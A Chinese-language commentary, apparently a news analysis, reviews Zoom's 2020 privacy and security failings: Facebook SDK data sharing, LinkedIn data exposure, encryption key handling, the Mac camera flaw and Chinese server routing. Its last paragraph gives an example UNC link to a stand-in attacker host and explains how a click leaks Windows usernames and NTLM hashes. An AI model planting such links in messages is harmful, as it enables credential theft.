2.Zoom的安全性，对于大多数普通用户和非关键任务团队协作来说都是足够的。普通用户无需为Zoom的大量负面报道而困惑，目前Zoom的“安全风暴”，更多还是专业领域的讨论。

（1）不良的隐私惯例；

（2）不良的安全惯例；

（3）不良的用户配置。

3月26日，《Motherboard》刊文指出，只要是在iOS系统下载或打开Zoom App时，Zoom就会通过Facebook SDK路径向Facebook传送用户隐私信息，就连非Facebook用户也是如此。

Zoom会秘密显示人们LinkedIn个人资料中的数据，这使一些会议参与者可以互相窥探。

参考阅读：使用Zoom远程办公需要留神的四个隐私安全问题

目前就Zoom加密问题发声的密码学家都强调说，Zoom的集中式密钥管理系统和不透明的密钥生成是该公司过去的端到端加密声明以及当前混乱的消息传递的最大问题（专家们并没有揪住在中国设置密钥服务器的问题，因此一心想把这个问题政治化的人，只敢在娱乐媒体平台上混淆视听）。实际上不仅是Zoom，大多数多方视频会议应用都难以做到真正的端到端，但是，人家没有玩文字游戏，没有糊弄用户。

非受迫性失误：摄像头后门和“中国服务器”。Schneier指出，这并不是Zoom第一次在安全性上草率行事。去年，一位研究人员发现Mac Zoom Client中的漏洞允许任何恶意网站未经许可就启用相机。这似乎是一个蓄意的设计选择：Zoom设计了其服务来绕过浏览器安全设置，并在用户不知情或未同意的情况下远程启用用户的网络摄像机（EPIC 对此提出了FTC投诉）。Zoom去年修补了此漏洞。

此外，关于北美用户会话的加密密钥需要经过中国服务器的违规问题，Zoom已经第一时间确认并完成整改，Zoom指出这是疫情期间北美服务器压力过大增配服务器时“不小心”在白名单中错误地配置了两个中国的数据中心。

Schneier指出，根据Zoom最近曝出的各种安全问题来看，这类不良安全决策、草率的编码错误以及随机的软件漏洞还会有更多。

低级失误：系统登录凭据泄露漏洞（UNC注入攻击）。Windows版Zoom应用程序（Mac系统也存在类似问题）会自动将通用命名字符串UNC（例如\\ attacker.example.com/C$）转换为可点击的链接（很多软件都会区分对待URL和UNC，后者不应被转换成可点击链接而是以纯文本发送）。如果目标点击恶意UNC链接，则Zoom会将Windows用户名和相应的NTLM哈希发送到链接中包含的地址，从而导致系统登录凭据泄露。产品存在安全漏洞是很正常的事情，但是一些水准之下的漏洞，则会暴露一个创业公司的安全能力和安全意识的欠缺，对品牌的伤害很大！